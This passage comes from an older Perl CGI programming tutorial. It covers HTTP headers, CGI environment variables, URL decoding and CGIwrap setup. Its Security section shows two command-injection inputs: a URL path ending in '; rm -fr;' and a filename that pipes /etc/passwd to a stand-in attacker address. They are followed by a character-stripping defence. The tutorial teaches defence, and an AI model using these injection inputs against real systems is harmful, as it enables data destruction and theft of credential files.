</PRE></BLOCKQUOTE>
<P>Once the <TT>Location</TT> header has been printed, nothing else should be printed. That is all the information that the client Web browser needs.
<P>Cookies and the <TT>Set-cookie:</TT> header are discussed in the "Cookies" section later in this chapter.
<P>The last type of HTTP header is the <TT>Status</TT> header. This header should be sent when an error arises in your script that your program is not equipped to handle. I feel that this HTTP header should not be used unless you are under severe time pressure to complete a project. You should try to create your own error handling routines that display a full Web page that explains the error that happened and what the user can do to fix or circumvent it. You might include the time, date, type of error, contact names and phone numbers, and any other information that might be useful to the user. Relying on the standard error messages of the Web server and browser will make your Web site less user friendly.
<H2><A NAME="CGIandEnvironmentVariables"><FONT SIZE=5 COLOR=#FF0000>CGI and Environment Variables</FONT></A></H2>
<P>You are already familiar with environment variables if you read <A HREF="ch12.htm" >Chapter 12</A>, "Using Special Variables." 
When your CGI program is started, the Web server creates and initializes a number of environment variables that your program can access using the <TT>%ENV</TT> hash.
<P>Table 19.2 contains a short description of each environment variable. A complete description of the environment variables used in CGI programs can be found at
<BLOCKQUOTE><PRE>http://www.ast.cam.ac.uk/~drtr/cgi-spec.html<BR></PRE></BLOCKQUOTE>
<P><CENTER><B>Table 19.2 CGI Environment Variables</B></CENTER><p>
<CENTER><TABLE BORDERCOLOR=#000000 BORDER=1 WIDTH=80%>
<TR><TD WIDTH=199><I>Variable Name</I></TD><TD WIDTH=391><I>Description</I></TD></TR>
<TR><TD WIDTH=199>AUTH_TYPE</TD><TD WIDTH=391>Optionally provides the authentication protocol used to access your script if the local Web server supports authentication and if authentication was used to access your script.</TD></TR>
<TR><TD WIDTH=199>CONTENT_LENGTH</TD><TD WIDTH=391>Optionally provides the length, in bytes, of the content provided to the script through the <TT>STDIN</TT> file handle. Used particularly in the <TT>POST</TT> method of form processing. See <A HREF="ch20.htm" >Chapter 20</A>, "Form Processing," for more information.</TD></TR>
<TR><TD WIDTH=199>CONTENT_TYPE</TD><TD WIDTH=391>Optionally provides the type of content available from the <TT>STDIN</TT> file handle. This is used for the <TT>POST</TT> method of form processing. Most of the time, this variable will be blank and you can assume a value of <TT>application/octet-stream</TT>. </TD></TR>
<TR><TD WIDTH=199>GATEWAY_INTERFACE</TD><TD WIDTH=391>Provides the version of CGI supported by the local Web server. Most of the time, this will be equal to <TT>CGI/1.1</TT>.</TD></TR>
<TR><TD WIDTH=199>HTTP_ACCEPT</TD><TD WIDTH=391>Provides a comma-separated list of MIME types the browser software will accept. 
You might check this environment variable to see if the client will accept a certain kind of graphic file.</TD></TR>
<TR><TD WIDTH=199>HTTP_FROM</TD><TD WIDTH=391>Provides the user's e-mail address. Not all Web browsers will supply this information to your server. Therefore, use this field only to provide a default value for an HTML form.</TD></TR>
<TR><TD WIDTH=199>HTTP_USER_AGENT</TD><TD WIDTH=391>Provides the type and version of the user's Web browser. For example, the Netscape Web browser is called Mozilla.</TD></TR>
<TR><TD WIDTH=199>PATH_INFO</TD><TD WIDTH=391>Optionally contains any extra path information from the HTTP request that invoked the script.</TD></TR>
<TR><TD WIDTH=199>PATH_TRANSLATED</TD><TD WIDTH=391>Maps the script's virtual path (i.e., from the root of the server directory) to the physical path used to call the script.</TD></TR>
<TR><TD WIDTH=199>QUERY_STRING</TD><TD WIDTH=391>Optionally contains form information when the <TT>GET</TT> method of form processing is used. <TT>QUERY_STRING</TT> is also used for passing information such as search keywords to CGI scripts.</TD></TR>
<TR><TD WIDTH=199>REMOTE_ADDR</TD><TD WIDTH=391>Contains the dotted-decimal IP address of the user.</TD></TR>
<TR><TD WIDTH=199>REMOTE_HOST</TD><TD WIDTH=391>Optionally provides the domain name for the site that the user has connected from.</TD></TR>
<TR><TD WIDTH=199>REMOTE_IDENT</TD><TD WIDTH=391>Optionally provides client identification when your local server has contacted an IDENTD server on a client machine. You will very rarely see this because the IDENTD query is slow.</TD></TR>
<TR><TD WIDTH=199>REMOTE_USER</TD><TD WIDTH=391>Optionally provides the name used by the user to access your secured script. </TD></TR>
<TR><TD WIDTH=199>REQUEST_METHOD</TD><TD WIDTH=391>Usually contains either "GET" or "POST", the method by which form information will be made available to your script. 
See <A HREF="ch20.htm" >Chapter 20</A>, "Form Processing," for more information.</TD></TR>
<TR><TD WIDTH=199>SCRIPT_NAME</TD><TD WIDTH=391>Contains the virtual path to the script.</TD></TR>
<TR><TD WIDTH=199>SERVER_NAME</TD><TD WIDTH=391>Contains the configured hostname for the server.</TD></TR>
<TR><TD WIDTH=199>SERVER_PORT</TD><TD WIDTH=391>Contains the port number that the local Web server software is listening on. The standard port number is 80.</TD></TR>
<TR><TD WIDTH=199>SERVER_PROTOCOL</TD><TD WIDTH=391>Contains the version of the Web protocol this server uses. For example, <TT>HTTP/1.0</TT>.</TD></TR>
<TR><TD WIDTH=199>SERVER_SOFTWARE</TD><TD WIDTH=391>Contains the name and version of the Web server software. For example, <TT>WebSite/1.1e</TT>.</TD></TR>
</TABLE></CENTER><P>
<H2><A NAME="URLENCoding"><FONT SIZE=5 COLOR=#FF0000>URL Encoding</FONT></A></H2>
<P>One of the limitations that the WWW organizations have placed on the HTTP protocol is that the content of the commands, responses, and data that are passed between client and server should be clearly defined. It is sometimes difficult to tell simply from the context whether a space character is a field delimiter or an actual space character to add whitespace between two words.
<P>To clear up the ambiguity, the URL encoding scheme was created. Any spaces are converted into plus (<TT>+</TT>) signs to avoid semantic ambiguities. In addition, special characters or 8-bit values are converted into their hexadecimal equivalents and prefaced with a percent sign (<TT>%</TT>). For example, the string <TT>Davy Jones &lt;dj@planet.net&gt;</TT> is encoded as <TT>Davy+Jones+%3Cdj@planet.net%3E</TT>. If you look closely, you see that the <TT>&lt;</TT> character has been converted to <TT>%3C</TT> and the <TT>&gt;</TT> character has been converted to <TT>%3E</TT>.
<P>Your CGI script will need to be able to convert URL-encoded information back into its normal form. 
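<P>Going the other way, the encoding rules just described can be sketched in Perl. This is only an illustrative sketch: <TT>encodeURL()</TT> is a hypothetical helper, not one of this chapter's listings, and its set of characters left unescaped (letters, digits, and a few punctuation marks including <TT>@</TT>) is an assumption chosen to reproduce the example above. It also assumes the input is a string of 8-bit characters.

```perl
use strict;
use warnings;

# Hypothetical helper, not part of the chapter's listings.
# Assumption: letters, digits, "_", ".", "@", and "-" pass through unchanged;
# many real encoders escape more characters than this (for example "@").
sub encodeURL {
    my ($text) = @_;

    # Replace every other character except the space with %XX,
    # where XX is its two-digit hexadecimal code.
    $text =~ s/([^A-Za-z0-9_.\@ -])/sprintf('%%%02X', ord($1))/eg;

    # Spaces become plus signs. A literal "+" in the input was already
    # escaped to %2B by the previous step, so the result stays unambiguous.
    $text =~ tr/ /+/;

    return $text;
}

print encodeURL('Davy Jones <dj@planet.net>'), "\n";
```

<P>If the sketch behaves as intended, the printed line should match the encoded form of the Davy Jones example shown earlier. Decoding, which is what a CGI script actually needs, comes next.<P>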
Fortunately, Listing 19.2 contains a function that will decode URL-encoded strings.
<P><IMG SRC="pseudo.gif" BORDER=1 ALIGN=RIGHT><p>
<BLOCKQUOTE><I>Define the </I><TT><I>decodeURL()</I></TT><I> function.<BR>Get the encoded string from the parameter array.<BR>Translate all plus signs into spaces.<BR>Convert characters coded as hexadecimal digits into regular characters.<BR>Return the decoded string.</I></BLOCKQUOTE>
<HR>
<BLOCKQUOTE><B>Listing 19.2 19LST02.PL-How to Decode the URL Encoding<BR></B></BLOCKQUOTE>
<BLOCKQUOTE><PRE>sub decodeURL {
    local $_ = shift;    # localized so the caller's $_ is untouched
    tr/+/ /;             # plus signs back to spaces
    s/%([0-9A-Fa-f]{2})/pack('C', hex($1))/eg;    # %XX back to one character
    return($_);
}</PRE></BLOCKQUOTE>
<HR>
<P>This function will be used in <A HREF="ch20.htm" >Chapter 20</A>, "Form Processing," to decode form information. It is presented here because canned queries also use URL encoding.
<H2><A NAME="Security"><FONT SIZE=5 COLOR=#FF0000>Security</FONT></A></H2>
<P>CGI really has only one large security hole that I can see. If you pass information that came from a remote site to an operating system command, you are asking for trouble. I think an example is needed to understand the problem because it is not obvious.
<P>Suppose that you had a CGI script that formatted a directory listing and generated a Web page that let visitors view the listing. In addition, let's say that the name of the directory to display was passed to your program using the <TT>PATH_INFO</TT> environment variable. The following URL could be used to call your program:
<BLOCKQUOTE><PRE>http://www.foo.com/cgi-bin/dirlist.pl/docs</PRE></BLOCKQUOTE>
<P>Inside your program, the <TT>PATH_INFO</TT> environment variable is set to <TT>/docs</TT>. In order to get the directory listing, all that is needed is a call to the <TT>ls</TT> command in UNIX or the <TT>dir</TT> command in DOS. 
Everything looks good, right?
<P>But what if the program was invoked with this URL?
<BLOCKQUOTE><PRE>http://www.foo.com/cgi-bin/dirlist.pl/; rm -fr;</PRE></BLOCKQUOTE>
<P>Now, all of a sudden, you are faced with the possibility of files being deleted because the semicolon (;) lets multiple commands be executed on one command line.
<P>This same type of security hole is possible any time you try to run an external command. You might be tempted to use the <TT>mail</TT>, <TT>sendmail</TT>, or <TT>grep</TT> commands to save time while writing your CGI program, but because all of these programs are easily duplicated using Perl, try to resist the temptation.
<P>Another security hole is related to using external data to open or create files. Some enterprising hacker could use <TT>"|mail hacker@hacker.com &lt; /etc/passwd"</TT> as the filename to mail your password file or any other file to himself.
<P>All of these security holes can be avoided by removing the dangerous characters (like the | or pipe character).
<P><IMG SRC="pseudo.gif" BORDER=1 ALIGN=RIGHT><p>
<BLOCKQUOTE><I>Define the </I><TT><I>improveSecurity()</I></TT><I> function.<BR>Copy the passed string into </I><TT><I>$_</I></TT><I>, the default search space.<BR>Protect against command-line options by removing the first run of </I><TT><I>-</I></TT><I> characters.<BR>Additional protection against command-line options.<BR>Convert all dangerous characters into harmless underscores.<BR>Return the </I><TT><I>$_</I></TT><I> variable.</I></BLOCKQUOTE>
<P>Listing 19.3 shows how to remove dangerous characters.
<HR>
<BLOCKQUOTE><B>Listing 19.3 19LST03.PL-How to Remove Dangerous Characters<BR></B></BLOCKQUOTE>
<BLOCKQUOTE><PRE>sub improveSecurity {
    local $_ = shift;                       # localized so the caller's $_ is untouched
    s/\-+(.*)/$1/g;                         # drop the first run of dashes
    s/(.*)[ \t]+\-(.*)/$1$2/g;              # drop whitespace followed by a dash
    tr/\$\'\`\"\&lt;\&gt;\/\;\!\|/_/;   # dangerous characters become underscores
    return($_);
}</PRE></BLOCKQUOTE>
<HR>
<H2><A NAME="CGIwrapandSecurity"><FONT SIZE=5 COLOR=#FF0000>CGIwrap and Security</FONT></A></H2>
<P>CGIwrap (<B>http://wwwcgi.umr.edu/~cgiwrap/</B>) is a UNIX-based utility 
written by Nathan Neulinger that lets general users run CGI scripts without needing access to the server's <TT>cgi-bin</TT> directory. Normally, all scripts must be located in the server's main <TT>cgi-bin</TT> directory and all run with the same UID (user ID) as the Web server. CGIwrap performs various security checks on the scripts before changing ID to match the owner of the script. All scripts are executed with the same user ID as the user who owns them. CGIwrap works with NCSA, Apache, CERN, Netsite, and probably any other UNIX Web server.
<P>Any files created by a CGI program are normally owned by the Web server. This can cause a problem if you need to edit or remove files created by CGI programs. You might have to ask the system administrator for help because you lack the proper authorization. All CGI programs have the same system permissions as the Web server. If you run your Web server under the root user ID (being either very brave or very foolish), a CGI program could be tricked into erasing the entire hard drive. CGIwrap provides a way around these problems.
<P>With CGIwrap, scripts are located in users' <TT>public_html/cgi-bin</TT> directory and run under their user ID. This means that any files the CGI program creates are owned by the same user. Damage caused by any security bugs you may have introduced via the CGI program will be limited to your own set of directories.
<P>In addition to this security advantage, CGIwrap is also an excellent debugging tool. 
When CGIwrap is installed, it is also made available under the name <TT>cgiwrapd</TT>, which can be used to view the output of failing CGIs.
<P>You can install CGIwrap by following these steps:
<OL>
<LI>Obtain the source from the <B>http://www.umr.edu/~cgiwrap/download.html</B> Web page.
<LI>Ensure that you have root access.
<LI>Unpack and run the Configure script.
<LI>Type <B>make</B>.
<LI>With a user ID of root, copy the <TT>cgiwrap</TT> executable to your server's <TT>cgi-bin</TT> directory.
<LI>Make sure that <TT>cgiwrap</TT> is owned by root and executable by all users by typing <B>chown root cgiwrap; chmod 4755 cgiwrap</B>. The leading 4 in the mode sets the set-UID bit, which the <TT>cgiwrap</TT> executable requires.
<LI>In order to gain the debugging advantages of CGIwrap, create symbolic links to <TT>cgiwrap</TT> called <TT>cgiwrapd</TT>, <TT>nph-cgiwrap</TT>, and <TT>nph-cgiwrapd</TT>. The first symbolic link can be created by typing <B>ln -s cgiwrap cgiwrapd</B>. The others are created using similar commands.
</OL>
<P><p>
<CENTER><TABLE BORDERCOLOR=#000000 BORDER=1 WIDTH=80%>
<TR><TD><B>Tip</B></TD></TR>
<TR><TD><BLOCKQUOTE>You can find additional information at the <TT><B><FONT FACE="Courier">http://www.umr.edu/~cgiwrap/install.html</FONT></B></TT> Web page.</BLOCKQUOTE></TD></TR>
</TABLE></CENTER><P>
<P>CGIs that run using CGIwrap are stored in a <TT>cgi-bin</TT> directory under an individual user's public Web directory and called like this:
<BLOCKQUOTE><PRE>http://servername/cgi-bin/cgiwrap/~userid/scriptname</PRE></BLOCKQUOTE>
<P>To debug a script run via CGIwrap, add the letter "d" to <TT>cgiwrap</TT>:
<BLOCKQUOTE><PRE>http://servername/cgi-bin/cgiwrapd/~userid/scriptname</PRE></BLOCKQUOTE>
<P>When you use CGIwrap to debug your CGI programs, quite a lot of information will be displayed in the Web browser's window. For example, if you called a CGI program with the following URL:
<BLOCKQUOTE><PRE>http://www.engr.iupui.edu/cgi-bin/cgiwrapd/~dbewley/cookie-test.pl